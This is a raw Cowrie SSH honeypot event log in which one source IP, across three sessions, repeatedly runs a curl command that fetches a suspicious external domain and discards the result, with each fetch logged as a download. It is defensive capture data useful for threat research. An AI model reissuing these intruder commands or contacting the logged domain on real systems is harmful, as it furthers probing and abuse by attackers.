{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.635241Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.665724Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.666765Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.667212Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.670380Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.675487Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.676147Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.678013Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.678423Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.706012Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.709768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.710796Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.711593Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.716025Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.717944Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.718592Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.721701Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.722440Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.725393Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.753942Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.754982Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.755559Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.759369Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.764870Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.767282Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.768703Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.769355Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.771140Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.772300Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.802155Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.806015Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.806731Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.839718Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.840263Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.843534Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.845070Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.845776Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.848927Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.852684Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.885195Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.885672Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.890892Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.892075Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.892668Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.914251Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.914923Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.918807Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.921785Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.922396Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.925534Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.930002Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.946763Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.947681Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.955487Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.957736Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.960234Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.961030Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.978243Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.978862Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.983069Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.983530Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.987279Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.990821Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.993322Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.017097Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.018196Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.018832Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.021430Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.021995Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.025421Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.026694Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.055884Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.057808Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.059435Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.059950Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.064280Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.065571Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.066366Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.069450Z","src_ip":"212.227.125.160","session":"9f264c568782"}
